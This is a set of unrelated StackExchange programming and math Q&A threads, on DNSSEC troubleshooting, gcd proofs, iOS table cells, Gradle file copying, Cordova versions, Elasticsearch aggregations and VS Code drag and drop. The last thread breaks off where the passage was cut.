DNS Issue - dig shows SERVFAIL / nslookup shows server can't find I have domain example.com, which is registered in czech domain provider and it's nameservers are linked to AWS Route53. I am hosting it from my S3 bucket. This setup recently stopped working and I can't figure out what went wrong (no changes from my side). Why is AWS nslookup working and Google one is not? (see below) What is the issue with dig +trace @<IP_ADDRESS> example.com? (last command) AWS Route53 Settings Domain settings: whois example.com nsset: NS-PAVELSKRIPAL-CZ nserver: ns-1302.awsdns-34.org nserver: ns-1681.awsdns-18.co.uk nserver: ns-415.awsdns-51.com nserver: ns-551.awsdns-04.net registrar: REG-WEB4U created: 07.03.2018 23:06:05 changed: 09.03.2018 11:09:24 Nslookup succeed (AWS) Query to Route53 dns server works (server name taken from AWS Route53): nslookup example.com ns-1302.awsdns-34.org. Server: ns-1302.awsdns-34.org. Address: <IP_ADDRESS>#53 Name: example.com Address: <IP_ADDRESS> Nslookup fails (Google) Query to Google DNS fails: nslookup example.com <IP_ADDRESS> Server: <IP_ADDRESS> Address: <IP_ADDRESS>#53 server can't find example.com: SERVFAIL Dig SERVFAIL Dig command displays SERVFAIL: dig example.com ; <<>> DiG 9.11.3-1ubuntu1.11-Ubuntu <<>> example.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 31793 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;example.com. IN A ;; Query time: 131 msec ;; SERVER: <IP_ADDRESS>#53(<IP_ADDRESS>) ;; WHEN: Thu Apr 23 11:32:02 CEST 2020 ;; MSG SIZE rcvd: 44 Dig +trace And I am not able to analyze this dig trace command. I cannot see where is the issue. dig +trace @<IP_ADDRESS> example.com ; <<>> DiG 9.11.3-1ubuntu1.11-Ubuntu <<>> +trace @<IP_ADDRESS> example.com ; (1 server found) ;; global options: +cmd . 85845 IN NS g.root-servers.net. . 85845 IN NS k.root-servers.net. . 85845 IN NS h.root-servers.net. . 85845 IN NS c.root-servers.net. . 85845 IN NS d.root-servers.net. . 85845 IN NS l.root-servers.net. . 85845 IN NS m.root-servers.net. . 85845 IN NS i.root-servers.net. . 85845 IN NS f.root-servers.net. . 85845 IN NS j.root-servers.net. . 85845 IN NS a.root-servers.net. . 85845 IN NS b.root-servers.net. . 85845 IN NS e.root-servers.net. . 85845 IN RRSIG NS 8 0<PHONE_NUMBER>0505170000<PHONE_NUMBER>0000 48903 . p0dM/vuSKrWpnMwMMqOcqI5wGiSuwu7M0QdlhfHXSKwd7xfTWP2w/l+T 5mEVmC0bflkUqXvSO5As3KgHU6H/xCIA+CpHVCqG7PqSqVz0ZXpswWNs yDCaqSa0OvpQ8xdz56m30cGcEuOTBKcenHcgG5oEPWnK6BRTpNzpsIlm ItB/8lc2JPfEEfeJank0H3VHPlzxVY43wwO8Ypv172o/7Km+6jG0h0Hf fgnChk6+waNcNvf+AbGmn3lob/5BH03ehJ5HotEd7YRdeb4dEf4ow5sP uwpiblIifXk2CrOYAFuAiU+DjYjxFBCdvR+smx+hminsxjC6klf/F2SA aSiVDg== ;; Received 525 bytes from <IP_ADDRESS>#53(<IP_ADDRESS>) in 2 ms cz. 172800 IN NS b.ns.nic.cz. cz. 172800 IN NS c.ns.nic.cz. cz. 172800 IN NS d.ns.nic.cz. cz. 172800 IN NS a.ns.nic.cz. cz. 86400 IN DS 20237 13 2 CFF0F3ECDBC529C1F0031BA1840BFB835853B9209ED1E508FFF48451 D7B778E2 cz. 86400 IN RRSIG DS 8 1 86400<PHONE_NUMBER>0000<PHONE_NUMBER>0000 48903 . ki1m2J3TYtNnxpmbI6qBXhpyFztJMdPWLQkRL1ri9uUSXC2BAVpw8sh7 UlzEHQKjTwsVfLeK/lLAz+xEcSjQcxS3rcW+vzxVQpG/DMiQZuNmFk8Q bciGQrf2DUw4vzBdTLj/c0rv5RDCrF8nCqABIFw2qbITQJt7qVh3IICY 4IABAlzu5ftmk2Osyek63lldviBsfWcg9IwL3augsvbslToGzPL0h6fy 2iNiRAaH+aBQkxjI9+zhAGRwn+kAEH+MA2c8hlW88mKteOjk8DD1nxzi w164u/i5lfuVQWOoapJEEOaLtr4Jo4m5lq7OBHFWdYamAlYmX4p+0dwC OcZ6+A== ;; Received 626 bytes from <IP_ADDRESS>#53(a.root-servers.net) in 16 ms example.com. 3600 IN NS ns-415.awsdns-51.com. example.com. 3600 IN NS ns-551.awsdns-04.net. example.com. 3600 IN NS ns-1302.awsdns-34.org. example.com. 3600 IN NS ns-1681.awsdns-18.co.uk. example.com. 3600 IN DS 21649 5 2 F4CEAE3A81831B64E3D4E1162ACD5172F8C56443179677CDB455F742 F459A8D4 example.com. 3600 IN RRSIG DS 13 2 3600<PHONE_NUMBER>0508<PHONE_NUMBER>3531 44987 cz. ntrFNqObEZTSXaZvD3TVvR2GwCxJSiE+gQYBre+rXlCtibqIMAmOp6u8 oow3rQEFuUT+dXUjoHHYbZFaOTyYRQ== ;; Received 330 bytes from <IP_ADDRESS>#53(d.ns.nic.cz) in 1 ms example.com. 5 IN A <IP_ADDRESS> example.com. 172800 IN NS ns-1302.awsdns-34.org. example.com. 172800 IN NS ns-1681.awsdns-18.co.uk. example.com. 172800 IN NS ns-415.awsdns-51.com. example.com. 172800 IN NS ns-551.awsdns-04.net. ;; Received 200 bytes from <IP_ADDRESS>#53(ns-551.awsdns-04.net) in 22 ms You are not giving the real name, while the DNS is public, which makes troubleshooting more difficult. Try dnsviz.net/ it is a good tool to troubleshoot online. From your obfuscated traces you have DNSSEC, this is the most probable cause of failure. Easy to check with dig, add +cd, if the SERVFAIL disappear then at a 99.99% probability the issue is with DNSSEC misconfiguration. dnsviz will shine here to show you the problem. But other than that the issue is kind of off topic here as it is not about running a website, the way you presented it. Also for problems like that your first stop should be the DNS provider. Did you ask it about the problems? I was giving the DNS name, but @john-conde edited it :-( The domain is pavelskripal.cz and it's still visible in the configuration image. I am pretty sure your "nsset" is conflicting with your "nserver" ones. You should decide once for all who manages your nameservers. You seem to be trying to use 2 "providers" at the same time, which in most cases won't work. @amra I was wondering if you found what was the issue? as I am having the same problem. Thank you @MeV It was a problem with DNSSEC. It should be supported now: https://stackoverflow.com/questions/52873371/how-to-setup-dnssec-for-dns-records-on-aws There was no solution for that year ago, so I just used Cloudflare service. These tools helped: https://dnssec-analyzer.verisignlabs.com/ https://dnsviz.net
common-pile/stackexchange_filtered
Which of the following statements are true for all such $a$ and $b$? Prove the statement or give a counterexample. For each of the following, decide whether or not the equality holds for all $a,b$. Prove each of the true statements and provide counterexamples for the false ones. $$\gcd(a+b,a-b)=\gcd(a,b)$$ $$\gcd(a+b,2a-b)=\gcd(a,b)$$ $$\gcd(a+b,2a+b)=\gcd(a,b)$$ $a$ and $b$ have to be positive integers, where $a>b$. I said the first statement is not true. Let $a=5$ and $b=3$. $a+b=8$, and $a-b=2$. Their gcd is $2$, but $5$ and $3$ are relativ3ly prime, so their gcd is $1$, which is not correct using the statement. Statement 2 is also false for $a=7$ and $b=2$. $gcd(9,12)=3$ and $gcd(7,2)=1$, and $3$ doesn't equal $1$ I said the third statement is true because if $a$ divides $b$, then a+b and 2a+b both will sum to something that has the gcd. Is my reasoning flawed? Hint: Always a good idea to work some examples. I have, just I'm not sure if I am picking the right numbers. For example, picking numbers that divide each other instead of picking numbers that have the same gcd but dont divide each other. It's hard to believe you tried any numbers at all if you think the first claim is true. What are some of the numbers you tried? Oh, I see. It is the problem for picking the right numbers. So? Have you found a counterexample for the first one? Yes,editing right now. I have edited the question. Ok! So you have a valid counterexample for the first one. Good start. Now, you think the second one might be false...can you find a counterexample to that one? Hint: Really, try some more examples. Yes, 7 and 2 i believe. Good! Note: if you want to practice proofs, you might try to show that the first claim is "almost true". That is, $\gcd(a+b,a-b)$ is either $\gcd(a,b)$ or $2\times \gcd(a,b)$. A similar result holds for the second (though it isn't $2$ you sometimes must multiply by). For the third: your intuition is good for that one, but your argument is insufficient. Basically you are just saying "it's true because it is true" which is not good enough. You will need to try to write a proper proof. Well, the gcd(a,b) must divide a+b and 2a+b Yes, that is so (and that also holds for the other two supposed equalities). Let us continue this discussion in chat. Notes on a proof of the third one. It is clear that $\gcd(a,b)$ divides both $a+b,\,2a+b$. We need to argue that any common divisor of $a+b,\,2a+b$ divides both $a,b$. We will use the fact that if $d$ divides $m,n$ then $d$ divides $Am+Bn$ for all $A,B\in \mathbb Z$. So, suppose that $d$ divides both $a+b,\,2a+b$. Then: $d\,|\,a$ Proof: $d$ must divide $2a+b-(a+b)=a$ $d\,|\,b$ Proof: $d$ must divide $2(a+b)-(2a+b)=b$ and we are done.
common-pile/stackexchange_filtered
How to change color of only one tableviewcell textlable.text? In my UITableView I have 7 tableviewcell,i just want to change textcolor of 5th cell.Is it possible? I tried Static cell but it wont work for me cause i only want one cell.textlable.textcolor change not othercell. if you're using static cells you can set the color in storyboards directly Hey i got the answer...i used the below code.--------if([cell.m_mainListLbl.text isEqualToString:@"Logout"]) { cell.m_mainListLbl.textColor=[UIColor redColor]; return cell; } If you have got the answer, why not post it as an answer? Use Something like this if(indexPath.row==4) { yourCell.textLabel.textColor=[UIColor redColor]; } else { yourCell.textLabel.textColor = [UIColor blackColor]; } not background color ,i want to change textcolor.Thanks for help. I changed it. My answer is correct . Please accept my answer This will cause problems. You need to add else { yourCell.textLabel.textColor = [UIColor blackColor]; }. Without that, as you scroll your table view, other cells will appear with the red text. Also the 5th cell will have a indexpath.row of 4 ;) if([cell.m_mainListLbl.text isEqualToString:@"Logout"]) { cell.m_mainListLbl.textColor=[UIColor redColor]; return cell; } I used this code. It Works for me. This will cause problems. You need to add else { cell.m_mainListLabl.textColor = [UIColor blackColor]; }. Without that, as you scroll your table view, other cells will appear with the red text.
common-pile/stackexchange_filtered
Stop Gradle from modifying my image/file attribute info on copy I have an application that sorts images based on attribute data such as date last modified. In my unit tests resource folder I have images test/resources/folder that get copied to a build/resources/test automatically when calling "gradle build". The problem is I need the files to have the same last modified date for testing. Is it possible to use javas Files.copy in my build script to move the data and maintain it's attributes? Or is there a way to tell gradle to stop messing with my files? Gradle task: task copyImages(type :Copy){ from 'src/test/resources' into 'build/resources/test' } Update: My solution based on feedback was to use JavaExec Gradle Build Script: apply plugin: 'java' repositories{ mavenCentral() } dependencies { testCompile group: 'junit', name: 'junit', version: '4.+' } task(moveImages, dependsOn: 'classes', type: JavaExec){ main = 'com.lifehug.support.TestSupport' classpath = sourceSets.test.runtimeClasspath args 'src/test/resources/navigator', 'build/resources/test/navigator' } defaultTasks 'moveImages' And then here is my java file to move the images Java File: public class TestSupport{ public static void main(String[] args) throws IOException { if( args.length < 2) return; final Path sourceDir = Paths.get(args[0]); final Path targetDir = Paths.get(args[1]); Files.walkFileTree(sourceDir, EnumSet.of(FileVisitOption.FOLLOW_LINKS), Integer.MAX_VALUE, new SimpleFileVisitor<Path>() { @Override public FileVisitResult preVisitDirectory(Path dir, BasicFileAttributes attrs) throws IOException { Path target = targetDir.resolve(sourceDir.relativize(dir)); Files.copy(dir, target, StandardCopyOption.COPY_ATTRIBUTES, StandardCopyOption.REPLACE_EXISTING); return FileVisitResult.CONTINUE; } @Override public FileVisitResult visitFile(Path file, BasicFileAttributes attrs) throws IOException { Files.copy(file, targetDir.resolve(sourceDir.relativize(file)), StandardCopyOption.COPY_ATTRIBUTES, StandardCopyOption.REPLACE_EXISTING); return FileVisitResult.CONTINUE; } }); } } I suppose a workaround would be to use ant.copy(preservelastmodified: true, ...) -- but it would be nice to know how to do this with native Gradle. Looks like you're right. I'm going to try the java route, but I agree this would work. Checking at Gradle Copy task documentation I could not find a way for preserving the file timestamp. Doing some more research apparently there's an open issue on that. As a workaround you can use alternative ways to copy, e.g. using ant.copy as @dnault suggested or just use java code (see examples here for Java 6 and Java 7). Noob question I assume, but can I use java code in my build.gradle script? Or do you mean create a java program and have Gradle run it? Gradle is built over Groovy which is built over Java. In other words, you can use Java freely in your gradle scripts.
common-pile/stackexchange_filtered
Install specific version of Cordova CLI in Visual Studio 2017 I need to do some updates to a Cordova app created using Visual Studio 2017 Tools for Apache Cordova (TACO). The Cordova CLI version listed in the config.xml file is 6.3.1 and the cordova-ios platform version is 4.2.0 When I try to build the project (using a Mac with XCode 8.3.3, I get this error Build failed with error Remotebuild requires your projects to use cordova-ios 4.3.0 or greater with XCode 8.3. Please update your cordova-ios version. I don't see any updates to TACO in VS2017 or instructions in the Microsoft documentation for Apache Cordova Tools. Ideally, I'd like to make the most minor version update possible to get my build working with XCode 8.3.3. I know there is a Cordova version 7.0.1, but I don't want to make that upgrade just yet because I'm under the gun time wise. Did you ever get a solution to this problem? I don't see any updates to TACO in VS2017 or instructions in the Microsoft documentation for Apache Cordova Tools. You can follow below steps to use the latest cordova-ios: Open config.xml with designer Toolset->Check the checkbox of Take latest patch(requires internet) on cordova-ios row. Update: If you don't see the checkbox in the designer page, you need to change it in the xml. Find the following tag in config.xml: <engine name="ios" spec="4.2.0" /> and modify it to: <engine name="ios" spec="~4.2.0" /> Update2: If the version is still not update to the latest, please try the below steps to fix the issue: Clear the cordova cache under: Tools->Options->Tools for Apache Cordova->Clear Cordova cache. Open cmd of your project folder; Type npm install -g cordova-ios to install globally the cordova-ios(requires node installed as pre-work); Then cordova platform rm ios; Type cordova platform add ios; Run your project again I don't see this checkbox. Only see dropdown for Toolset Name, with values for Cordova 6.3.1 or Global Cordova. cordova-ios is just static text with 4.2.0 Please try modify the engine tag in config.xml as I mentioned in the update. Thanks for the help...But, I have checked the box to take the latest patch for cordova-ios (it actually changes the 4.2.0 to ~4.2.0)...Then I rebuild the solution and I STILL get the same error. Remote build error from the build server http://<IP_ADDRESS>:3000/cordova - Build failed with error Remotebuild requires your projects to use cordova-ios 4.3.0 or greater with XCode 8.3. Please update your cordova-ios version. This solution doesn't work as I get the same result as Paul. @ElvisXia-MSFT I've repaired my VS2017 instance and after following again your instructions (Update2) this issue has gone. But now I have a new one: Remote build error from the build server http://<IP_ADDRESS>:3000/cordova - Build failed with error cordovaProject.projectConfig.getFileResources is not a function. - Do you have any idea what it means? This is so frustrating, please help! For iOS, please install<EMAIL_ADDRESS>This is the only version i found working with XCode 8.3.3 I had the same error, follow this steps : 1- If not installed yet, install Node 2- Install the latest version of cordova or anyother: npm install -g cordova 3- Install taco-cli: npm install -g taco-cli 4- Configure taco-cli : taco remote add ios (respond a few question, MAC IP, Port,etc...) 5- in your root project add or edit a file named "taco.json", add inside : { "cordova-cli": "7.1.0" } Where 7.1.0 correspond to your cordova version (cordova --v) 6- Try to emulate on your MAC: taco emulate ios You will maybe have an error about platform. Ignore it 7- Close then open Visual Studio 8- On Visual Studio open the config.xml UI EDITOR and change the toolset name with Global cordova 9- Build using Visual Studio. If it doesn't work, please let me know I've literally followed your instructions and this is the result: https://i.sstatic.net/l4utc.jpg Do you really have a file taco.json as in step 5? Do you have an error step 6? Yes I do. Even this user Reymonreyes85 wrote a comment reporting the same error I'm facing: https://learn.microsoft.com/en-us/visualstudio/cross-platform/tools-for-cordova/first-steps/installation I don't have the authority to add a comment to the answer above, so adding my updates here: If the version is still not update to the latest, please try the below steps to fix the issue: First, modify your project config.xml file using an editor, rather than through the tools. Not sure why it was necessary, but this was the key difference from the above instructions. I also found that 4.3.1 was best. Remove any ~ characters before the version. Then: Clear the cordova cache under: Tools->Options->Tools for Apache Cordova->Clear Cordova cache. Open cmd of your project folder Type npm install -g cordova-ios to install globally the cordova-ios(requires node installed as pre-work) Then cordova platform rm ios Type cordova platform add ios Run your project again If the cordova command in steps 4 and 5 doesn't work, add the cordova bin directory to you path. In my case C:\ProgramData\Microsoft\VisualStudio\MDA\ad0a0856\taco-toolset-6.3.1\node_modules.bin\
common-pile/stackexchange_filtered
How I can use pictures in my application? angular cli + webpack How I can use pictures in my application? How this is configured? angular-cli: 1.0.0-beta.16 (with webpack) I tried to puts my images inside assets/images/test.png or assets/test.png but does not work! and how I can grab my pictures from my html? angular-cli.json "apps": [ { "root": "src", "outDir": "dist", "assets": "assets", "index": "index.html", "main": "main.ts", "test": "test.ts", "tsconfig": "tsconfig.json", "prefix": "app", "mobile": false, "styles": [ "styles.css" ], ......other things.. Thanks. Do you have 404? Please avoid "does not work" without providing error log or anything that can help to identify problem
common-pile/stackexchange_filtered
Session-like storage option for a non-serializable object? Background (Skip this part if you want) Feel free to skip over this part if you choose, it's just some background for those who want to better understand the problem At the beginning of one action on my site, I kick off several asynchronous operations. The action returns before the operations are complete. This is what I want. However, the View that gets loaded by this action invokes several other actions in a different controller. Some of these actions rely on the results of the async calls from the first page, so I need to be able to wait on the async calls to finish from the other controller. I thought about just using Session to store the WaitHandles, but as WaitHandles aren't serializable, I obviously can't do that. Short version: I need to be able to store an async WaitHandle object somewhere from one controller, such that it can be reliably retrieved in a different controller. These WaitHandles also need to be user-specific, but I can handle that part. Just don't list an option that would make doing that impossible. And did you want that to scale to multiple servers? @HenkHolterman Well, yeah, but all the load balancing is taken care of at a higher level, so I would think I shouldn't have to worry about that Think again. Can you assure all related actions will run on the same server? @HenkHolterman Well, I don't know. I'd guess so, but I've never looked into the way we do load balancing around here as it isn't done by my team. I would guess the LB would be done per-session, but I don't know for sure. Also think about handling the resources. One aborted page and the server is left with a lot of dangling WaitHandles. @HenkHolterman Thought about it, but there's only 4 calls on the page, and only 1-2 that I need to actually implement this pattern on. On the "waiting" page, I had planned on checking for the existence and validity of the waithandle and then handling it accordingly. If its null or I catch an InvalidOperationException on deserializing, I'll get rid of it. Else, use it @HenkHolterman can you think of a way to do this? Maybe a static object in my basecontroller or something? A static object would also be limited to 1 memory space. No solution there. I would try to restructure it to rely on the HTTP protocol only.
common-pile/stackexchange_filtered
jQuery selectors: is the order of selectors important? I've an html document which looks like this: <div id="panel_comments"> <table id="panel_comments_table"> <tr> <td style="width: 150px;">Monday: </td> <td><textarea id="panel_comments_monday" rows="4" cols="60" >Monday comment area</textarea></td> </tr> .. same with the other 6 weekdays </table> </div> Now, if I want to select all textareas I would do the following, which is in a natural language: give me all elements which are textareas, with the following ids: $("textarea [id^=panel_comments_]") but it gives me an empty result. Instead I have to rearrange the selectors like this, which is in a natural language give me all elements with the ids, and which are textareas: $("[id^=panel_comments_] textarea") Why does the ordering of the selectors matter? Make sure you don't end up with few elements with the same id The space is significant here, it is the descendant selector. Just omit it: textarea[id^=panel_comments_] The reason why [id^=panel_comments_] textarea seems to work is that it selects the div element with ID panel_comments and then finds all textareas that are descendants of it. So, this only works "by accident" since the div and the textarea have similar IDs. Had you given the div element a completely different ID, it would not have worked. CSS selectors work on hierarchical structures, like HTML, so it is only reasonable that the order of "sub-selectors" matters. Only if you don't want to express relations between elements, the order almost doesn't matter: A simple selector is either a type selector or universal selector followed immediately by zero or more attribute selectors, ID selectors, or pseudo-classes, in any order. It was really an 'accident' that it worked the other way round. Thx, especially for the links. You want this, no extra space: $("textarea[id^=panel_comments_]") Using space as: $("textarea [id^=panel_comments_]") means select all elements with IDs inside textarea. Using: $("[id^=panel_comments_] textarea") means select all textarea inside elements with ID starting with your selector string. Following BoltClock's comment, type selector must be used before any extra filter selector, which means: $("textarea[id^=panel_comments_]") is valid $("[id^=panel_comments_]textarea") is not valid Also, you can rearrange selectors in a chain in any order, except that a type selector like textarea must always come first. $("textarea[id^=panel_comments_]") remove that extra space
common-pile/stackexchange_filtered
Why is the sum of two algebraic functions algebraic? Let $U\subset\mathbb{C}^n$ be a domain. A holomorphic function $f:U\to \mathbb{C}$ is called $\textbf{algebraic}$ if there exists a polynomial $p(x,y)$ in the variables of $U\times \mathbb{C}$ such that $p(x,f(x))=0$. A more geometric interpretation is that the graph $G_f$ of $f$ is an $\textbf{analytic component}$ of an algebraic set $X$. My question is: say $f,g$ are two algebraic functions, why is $f+g$ algebraic? It is unclear to me if the roots of $p$ define holomorphic functions, if they define them on all of $U$ etc. I also have a more general question. Say $f_1,_2:\mathbb{C}\to \mathbb{C}$ and $g:\mathbb{C}^2\to\mathbb{C}$, all three algebraic. (Also I ask about the case where they are defined on some general domain, I just require them to be composable). Why is $g(f_1,f_2):\mathbb{C}\to\mathbb{C}$ algebraic? Here there is a real issue, that the zariski closure of the graph of $G$ may be bad over some set (say it contains the entire fibre) and $(f_1,f_2)$ may hit this set. So that the graph of the composition is in general $\textbf{NOT}$ an analytic component of $\overline{G_g}\cap (f_1,f_2)(\mathbb{C})\times\mathbb{C}$. However it does seem that the composition is in general algebraic - why? Thank you very much! $a$ is algebraic over $k$ iff $k[a]$ is a finite dimensional $k$-vector space, in which case $k[a]=k(a)$ is a field. If $b$ is also algebraic then $k[a,b]$ is finite dimensional. $k[a+b]$ is a sub vector space so it must be finite dimensional. For the composition, with $f_1=f_1(z)$, use that if $g(x,y)$ is a root of $P(x,y,t)$ then $g(f_1,f_2)$ (if well-defined, ie. if analytic somewhere) is a root of $P(f_1,f_2,t)$, thus algebraic over $\Bbb{C}(z,f_1,f_2)$. If $f_1,f_2$ are algebraic too then $\Bbb{C}(z,f_1,f_2,g(f_1,f_2))$ is a finite dimensional $\Bbb{C}(z)$ vector space. Your proof is problematic. The polynomial $P(f_1,f_2,t)$ may be just the zero polynomial, if by chance the coefficients of $t$ (which are polynomials in $f_1,f_2$) in it are polynomial realtions for $f_1,f_2$. Note this issue doesn't happen with sum, since $t-f_1-f_2=0$ can never be the zero polynomial - it is monic. No because we take $P(x,y,t)\in \Bbb{C}(x,y)[t]_{monic}$. I should have said we need the coefficients of $P(f_1,f_2,t)$ to be analytic somewhere too (if $f_1=f_2$ and $P(x,y,0)=1/(x-y)$ then we'll have some trouble with $P(f_1,f_2,t)$) If you force $P$ to be Monic in $t$ then nothing assures you that the coefficients of $P(f_1,f_2,t)$ are meromorphic functions as you yourself write. Infact this issue corresponds exactly to the geometric issue that if $X=\overline{G}$ then $(f_1,f_2)$ may be contained in the set where $X$ contains the entire fibre (zariski closure is meant). Can you explain why you may choose $P$ so this issue doesn't happen? Let $F=\Bbb C(x_1,\cdots,x_n)$ be the field of rational functions $U\to \Bbb C$. If $f$ is algebraic on $U$, the relation $p(x,f(x))$ implies that $f(x)$ is algebraic over $F$: we get that it satisfies a monic polynomial in $F[y]$ after dividing $p(x,y)$ by the leading coefficient of $y$. As both $f_1$ and $f_2$ are algebraic, this implies that $F(f_1(x),f_2(x))$ is a finite-dimensional vector space over $F$. As $F(f_1(x)+f_2(x))\subset F(f_1(x),f_2(x))$ is a subspace, it must also be finite dimensional, so $f_1+f_2$ is algebraic over $F$ with minimal polynomial $g(y)$, whose coefficients are rational functions on $U$. After clearing denominators, we recover a polynomial of the form $p'(x,f_1(x)+f_2(x))$, which demonstrates that $f_1+f_2$ is algebraic on $U$. Your second question has a typo: you want the target of $f_1,f_2$ to be $\Bbb C$, not $\Bbb C^2$. The idea here is similar to the previous paragraph - write $F=\Bbb C(x_1)$, then $f_1,f_2$ are algebraic over $F$, and $g(f_1,f_2)$ is algebraic over $F(f_1,f_2)$ (take the relation $p(x_1,x_2,g(x_1,x_2))$ satisfied by $g$ and plug in for $x_1$ and $x_2$), so the composite extension $F(f_1,f_2,g(f_1,f_2))$ is algebraic over $F$, and thus $g(f_1,f_2)$ satisfies $p(x_1,y)$ via the same construction at the end of the previous paragraph. As for why we can ignore the "badness" of the closure of the graph, all we need is for our function to satisfy the polynomial relation on a dense set: for then $p(x,f(x))$ is a continuous function which is equal to zero on a dense set and thus zero everywhere by continuity. So "bad fibers" appearing infrequently enough don't invalidate our polynomial relation. (As an aside, it's interesting to compare these sorts of proofs to the case of semi-algebraic/definable functions: there, the strategy is to use quantifier elimination to write the projection of $(x,f_1(x),f_2(x),f_1(x)+f_2(x))$ in terms of formulas not involving $f_1$ or $f_2$. So somehow algebraicness here is playing the same role that quantifier elimination plays in those theories.) This is great, as it shows me where my difficulty is. I am actually interested in $Q$-algebraic functions - functions where one can finde such a polynomial $P$ with coefficients in $\mathbb{Q}$. For me the $\textbf{height}$ of such a function is is the height of the algebraic set ${P=0}$. I really want to show that the sum\composition of $Q$ algebraic functions are $Q$ algebraic, which follows from your remarks. I also want to bound the height of the sum\composition, and unfortunately I can't see right now how to do that, here the badness does make it difficult for me. Unfortunately, I don't really have much to add on the height front - you may wish to ask a new question dealing with that specific issue. Actually, I see an issue with your proof, for the composition part. It may well be that the polynomial $p(f_1,f_2,g(f_1,f_2))$ is the zero polynomial, if the coefficients of $p$ happen to be relations of $f_1,f_2$. I don't see a reason why this can't happen if they are composable. For instance if $f_1,f_2=0$ and $g=x/(1-sqrt(1+y))$. Then $p(f_1,f_2,g)$ is redundent. Still, of course the composition is algebraic, being just a constant function. I'll see what I can think of. In the mean time, that's not composable, so you may wish to adjust your example. Why isn't it composable? The branch where $\sqrt{1+0}=1$ is problematic at this point, but if you go around $y=-1$ you reach the branch where $\sqrt{1+0}=-1$, and there you get a nice function defined in a neighborhood of $(0,0)$. What do you think about this argument: Say $P(x_1,x_2,y)=a_0(x_1,x_2)y^{d}+...+a_0(x_1,x_2)$. Substitute $x_1=f_1$, $x_2=f_2+\epsilon$, and $y=g(x_1,x_2)$. Now for each $i$ we have $a_i(f_1,f_2+\epsilon)=\epsilon^{k_i}b_i(\epsilon)$ where $b_i$ has coefficients in $\mathbb{C}(x,f_1,f_2)$ and $b_i(0)\neq 0$. By dividing by the smallest power of $\epsilon$ and setting $\epsilon=0$ we get a required relation for $g(f_1,f_2)$. My only issue is that the range of $(f_1,f_2+\epsilon)$ may escape the domain of $g$ but maybe this issue can be solved?
common-pile/stackexchange_filtered
elastic search count don't add up after using aggregation I have an ES index, and I want to count the number of distinct CONTACT ID where [Have Agreement] flag is Y and N. The flag is unique for each CONTACT. However, when I add the contact with Y flag and N flag , the total count is different from total CONTACT number. 1.Total distinct CONTACT_ID count: POST /dashboard/_search?size=0 { "query": { "bool": { "must": [ { "range": { "CREATED": { "gte": "2021-07-04T00:00:00.001Z", "lte": "2021-12-31T00:00:00.001Z" } } } ] } }, "aggs": { "UniqueContact": { "cardinality": { "field": "CONTACT_ID.keyword" } } } } result is 27588 2.Distinct CONTACT_ID count for Y and N flags respectively: POST /dashboard/_search?size=0 { "query": { "bool": { "must": [ { "range": { "CREATED": { "gte": "2021-07-04T00:00:00.001Z", "lte": "2021-12-31T00:00:00.001Z" } } } ] } },"aggs": { "CVID": { "terms": { "field": "Have Agreement.keyword", "order": { "type_count": "desc" } }, "aggs": { "type_count": { "cardinality": { "field": "CONTACT_ID.keyword" } } } } } } result is 2692 and 2158. They add up to 4850. Evidence that shows the flag is unique for each contact POST /dashboard/_search?size=0 { "query": { "bool": { "must": [ { "range": { "CREATED": { "gte": "2021-07-04T00:00:00.001Z", "lte": "2021-12-31T00:00:00.001Z" } } } ] } },"aggs": { "CVID": { "terms": { "field": "CONTACT_ID.keyword", "order": { "type_count": "desc" } }, "aggs": { "type_count": { "cardinality": { "field": "Have Agreement.keyword" } } } } } } Results seems to be coherent, according to your example. Keep in mind cardinality are an approximation (you can set it to win some precision) https://www.elastic.co/guide/en/elasticsearch/reference/current/search-aggregations-metrics-cardinality-aggregation.html You have around 27588 distinct uniqueContact matching your query (cardinality is around 5% precision) Top aggregation by Y or N (Have Agreement.keyword) In the result we can read: 16725 documents with N 11190 documents with Y For the N group, you have around 2692 different uniqueContact For the Y group, you have around 2158 different uniqueContact So you have "duplicate" matching documents, we can see this in your 3) part. 10 doc with 3-QV3ZBW uniqueContact 10 doc with 3-QV3ZC3 uniqueContact => So your second request is correct, you have around 2692 distinct uniqueContact with N value (2158 for Y) The 2692 uniqueContact are present in 16725 docs, the 2158 others refers to 11190 16725 + 11190 => in the 27588 -+ 5% PS: Add a query term on 3-QV3ZBW for example, I think this will answer to your question with a simple example. Thanks. I added precision to be max (40000), and result is coherent now. My data is way above that number if I remove filter though, so looks like I dont have other options here? @LeBigCat
common-pile/stackexchange_filtered
How to drag a treeview item and drop into jupyter notebook within a jupyter editor in VSCode extension? I'm considering creating a VSCode extension for our project. I ran into some issues when I tried to implement a treeview item drag and drop to the editor. First, I implemented a MyTreeDataProvider class class MyTreeDataProvider implements vscode.TreeDataProvider<DataType>, vscode.TreeDragAndDropController<DataType> { dropMimeTypes = ['application/vnd.code.tree.mytree', 'text/uri-list']; dragMimeTypes = ['application/vnd.code.tree.mytree']; ... public async handleDrag( source: DataType[], dataTransfer: vscode.DataTransfer, token: vscode.CancellationToken ): Promise<void> { dataTransfer.set('application/vnd.code.tree.mytree', new vscode.DataTransferItem('placeholder'); } } Then I want to drop it into a jupyter notebook, so I did this below class FileDropProvider implements vscode.DocumentDropEditProvider { async provideDocumentDropEdits( _document: vscode.TextDocument, position: vscode.Position, dataTransfer: vscode.DataTransfer, token: vscode.CancellationToken ): Promise<vscode.DocumentDropEdit | undefined> { const dataTransferItem = dataTransfer.get('application/vnd.code.tree.mytree'); if (!dataTransferItem) { return undefined; } ... snippet.appendText('placeholder from drag\n'); return { insertText: snippet }; } } export function resisterDropProvider(context: vscode.ExtensionContext) { const selector: vscode.DocumentSelector = { notebookType: 'jupyter-notebook', scheme: 'file' }; context.subscriptions.push(vscode.languages.registerDocumentDropEditProvider(selector, new FileDropProvider ())); } In FileDropProvider, I can't read what I set in the drag function. A default value is used instead. I don't know what I wrote wrong, or does vscode not support drag-and-drop this way. Does anyone know about this? vscode package version: 1.70.0 windows 11 I want to drag a treeviewItem and drop into jupyter notebook. In handleDrag function, I couldn't set message into the dataTransfer. When dropped into the editor, only the default uri is printed. Do you know how to implement this function? The code sample looks correct but there were two VS Code bugs that caused it not to work: https://github.com/microsoft/vscode/issues/175589 — Tree drag operations were not updating the DataTransfer of the internal drag event https://github.com/microsoft/vscode/issues/175579 — Data transfer value lookups should be 